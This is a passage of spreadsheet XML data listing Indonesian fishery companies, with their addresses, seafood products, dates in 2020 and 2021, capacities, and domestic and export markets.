    <s v="Jl. Raya Karanggan RT 001 RW 003, Kel. Puspasari, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tiram Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21881"/>
    <x v="590"/>
    <s v="PT. KOIN BUMI"/>
    <s v="Jl. Raya Karanggan RT 001 RW 003, Kel. Puspasari, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cumi-cumi Kering"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21882"/>
    <x v="590"/>
    <s v="PT. KOIN BUMI"/>
    <s v="Jl. Raya Karanggan RT 001 RW 003, Kel. Puspasari, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Nori"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21883"/>
    <x v="590"/>
    <s v="PT. KOIN BUMI"/>
    <s v="Jl. Raya Karanggan RT 001 RW 003, Kel. Puspasari, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Sea Squirt Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21884"/>
    <x v="590"/>
    <s v="PT. KOIN BUMI"/>
    <s v="Jl. Raya Karanggan RT 001 RW 003, Kel. Puspasari, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Atka Makerel, Makerel, Pacific Saury, Tenggiri)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21885"/>
    <x v="543"/>
    <s v="PT. DAYARA LAUT SEJAHTERA"/>
    <s v="Pergudangan Sinar Buduran 3 Blok B23, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2020-08-14T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Malang, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21886"/>
    <x v="591"/>
    <s v="PT. KELOLA PANGAN MAKMUR"/>
    <s v="Jl. KIG Raya Selatan Kav. C-7, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bandung, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21887"/>
    <x v="591"/>
    <s v="PT. KELOLA PANGAN MAKMUR"/>
    <s v="Jl. KIG Raya Selatan Kav. C-7, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="50"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bandung, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21888"/>
    <x v="592"/>
    <s v="PT. BINTAN INTAN GEMILANG"/>
    <s v="Jl. Perikanan Barek Motor No.58 RT 003 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Beku"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="144000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Australia, China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21889"/>
    <x v="592"/>
    <s v="PT. BINTAN INTAN GEMILANG"/>
    <s v="Jl. Perikanan Barek Motor No.58 RT 003 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="144000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Australia, China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21890"/>
    <x v="593"/>
    <s v="PT. PANCA MITRA MULTIPERDANA"/>
    <s v="Jl. Kurau RT 16, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="721343"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21895"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Ikan Demersal Beku (Layur)"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="25000"/>
    <s v="Kabupaten Cilacap"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21896"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Surabaya"/>
    <s v="Philippines"/>
  </r>
  <r>
    <n v="21897"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Abalone Beku"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="21898"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Bandeng Beku"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21899"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Australia, China, Singapore"/>
  </r>
  <r>
    <n v="21900"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Teripang Beku"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Australia, Philippines, Singapore"/>
  </r>
  <r>
    <n v="21901"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21902"/>
    <x v="594"/>
    <s v="KOPERASI INKA BANTUL VII PROJO MINO"/>
    <s v="Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21904"/>
    <x v="114"/>
    <s v="CV. ANUGERAH BAHARI MANDIRI"/>
    <s v="Jl. Kapasa Raya No. 38A, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of"/>
  </r>
  <r>
    <n v="21905"/>
    <x v="595"/>
    <s v="PT. MALUKU PRIMA SUKSES"/>
    <s v="Jl. Trans, Desa Ureng, Kec. Leihitu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21910"/>
    <x v="359"/>
    <s v="CV. HOKKY SEAFOOD"/>
    <s v="Jl. Perintis Kemerdekaan Ruko 237 No.17-18, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakatua, Bawal, Kakap, Barramundi)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Hong Kong, Saudi Arabia"/>
  </r>
  <r>
    <n v="21911"/>
    <x v="359"/>
    <s v="CV. HOKKY SEAFOOD"/>
    <s v="Jl. Perintis Kemerdekaan Ruko 237 No.17-18, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Tongkol, Cakalang, Tenggiri)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="4000"/>
    <m/>
    <s v="Hong Kong, Saudi Arabia"/>
  </r>
  <r>
    <n v="21913"/>
    <x v="588"/>
    <s v="CV. GOLDEN SEAFRESH"/>
    <s v="Jl. Kapten Rahmad Budin Link 14, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21915"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Mentah Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="Canada, United States"/>
  </r>
  <r>
    <n v="21916"/>
    <x v="596"/>
    <s v="PT, IROHA SIDAT INDONESIA"/>
    <s v="Jl, Gatot Subroto No,46, Kel, Bulusan, Kec, Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bawal, Kakap Merah, Kod, Doversole)"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="Canada, United States"/>
  </r>
  <r>
    <n v="21917"/>
    <x v="597"/>
    <s v="PT. SEKAR LAUT, TBK"/>
    <s v="Jl. Jenggolo II/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sambal Teri"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="Brunei Darussalam, Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Netherlands, Saudi Arabia, Singapore, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="21918"/>
    <x v="169"/>
    <s v="CV. GIOVANNI SUKSES MAKMUR"/>
    <s v="Jl. Berbek Industri 5 No. 1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Netherlands, Portugal, United States"/>
  </r>
  <r>
    <n v="21919"/>
    <x v="598"/>
    <s v="KELETEK AFDAL"/>
    <s v="Jl. Syarif Hidayatullah RT 02, Kel. Tungkal II, Kec. Tungkal Ilir, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Kerupuk Ikan, Kerupuk Udang"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="2280"/>
    <s v="Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="21920"/>
    <x v="169"/>
    <s v="CV. GIOVANNI SUKSES MAKMUR"/>
    <s v="Jl. Berbek Industri 5 No. 1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Germany, Japan, Netherlands, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21922"/>
    <x v="599"/>
    <s v="PT. ALAM RAYA SURYA INDAH"/>
    <s v="Jl. Pergudangan Mutiara Kosambi I Blok A2 No. 8, Kel. Kosambi, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, India, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Oman, Pakistan, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21923"/>
    <x v="599"/>
    <s v="PT. ALAM RAYA SURYA INDAH"/>
    <s v="Jl. Pergudangan Mutiara Kosambi I Blok A2 No. 8, Kel. Kosambi, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Bawal, Kakap, Ekor Kuning)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, India, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Oman, Pakistan, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21924"/>
    <x v="599"/>
    <s v="PT. ALAM RAYA SURYA INDAH"/>
    <s v="Jl. Pergudangan Mutiara Kosambi I Blok A2 No. 8, Kel. Kosambi, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Sarden, Selar, Cakalang)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, India, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Oman, Pakistan, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21925"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Kering (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21931"/>
    <x v="600"/>
    <s v="PT. GOLDEN BRIDGE INTERNATIONAL"/>
    <s v="Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Pasteurisasi Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="17161"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21932"/>
    <x v="600"/>
    <s v="PT. GOLDEN BRIDGE INTERNATIONAL"/>
    <s v="Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal , Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kepiting Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="15172"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21933"/>
    <x v="600"/>
    <s v="PT. GOLDEN BRIDGE INTERNATIONAL"/>
    <s v="Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21934"/>
    <x v="592"/>
    <s v="PT. BINTAN INTAN GEMILANG"/>
    <s v="Jl. Perikanan Barek Motor No.58 RT 003 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="24000"/>
    <s v="Kabupaten Bintan"/>
    <s v="Australia, China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21935"/>
    <x v="592"/>
    <s v="PT. BINTAN INTAN GEMILANG"/>
    <s v="Jl. Perikanan Barek Motor No.58 RT 003 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="24000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Australia, China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21936"/>
    <x v="588"/>
    <s v="CV. GOLDEN SEAFRESH"/>
    <s v="Jl. Kapten Rahmad Budin Link 14, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Manyung, Kerapu, Bawal, Pepetek, Kakap Merah, Kurisi)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21938"/>
    <x v="588"/>
    <s v="CV. GOLDEN SEAFRESH"/>
    <s v="Jl. Kapten Rahmad Budin Link 14, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21939"/>
    <x v="9"/>
    <s v="PT, REPUBLIK LAUTAN JAYA"/>
    <s v="Muara Angke PHPT Pengasinan Blok A No,6 RT 006 RW 001, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Teripang Kering"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21941"/>
    <x v="601"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG BACAN"/>
    <s v="Desa Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Cobia, Malalugis, Marlin, Cakalang, Tenggiri)"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21942"/>
    <x v="601"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG BACAN"/>
    <s v="Desa Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Beku (Emperor, Flounder, Kerapu, Kakatua, Bawal, Kakap, Barramundi)"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="16000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21943"/>
    <x v="601"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG BACAN"/>
    <s v="Desa Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Ternate"/>
    <m/>
  </r>
  <r>
    <n v="21944"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21946"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="1000000000"/>
    <s v="Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Semarang, Kota Surabaya, Kota Tangerang, Kota Denpasar, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21947"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="1000000000"/>
    <s v="Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21948"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Hidup"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21949"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Hidup (Betutu, Bandeng, Nila, Mas, Patin, Lele)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21950"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Keong Hidup"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21952"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Hidup"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21954"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Segar (Betutu, Bandeng, Nila, Mas, Patin, Lele)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="21955"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21956"/>
    <x v="602"/>
    <s v="PT. INDO PRIMA WIRATAMA"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Segar"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21957"/>
    <x v="603"/>
    <s v="PT. HARMONI SAMUDRA PERKASA"/>
    <s v="Jl. Daeng Salili No.17A RT 01 RW 01, Kel. Kampung Bugis, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi, Gurita)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="2070"/>
    <s v="Kabupaten Karimun, Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="21958"/>
    <x v="603"/>
    <s v="PT. HARMONI SAMUDRA PERKASA"/>
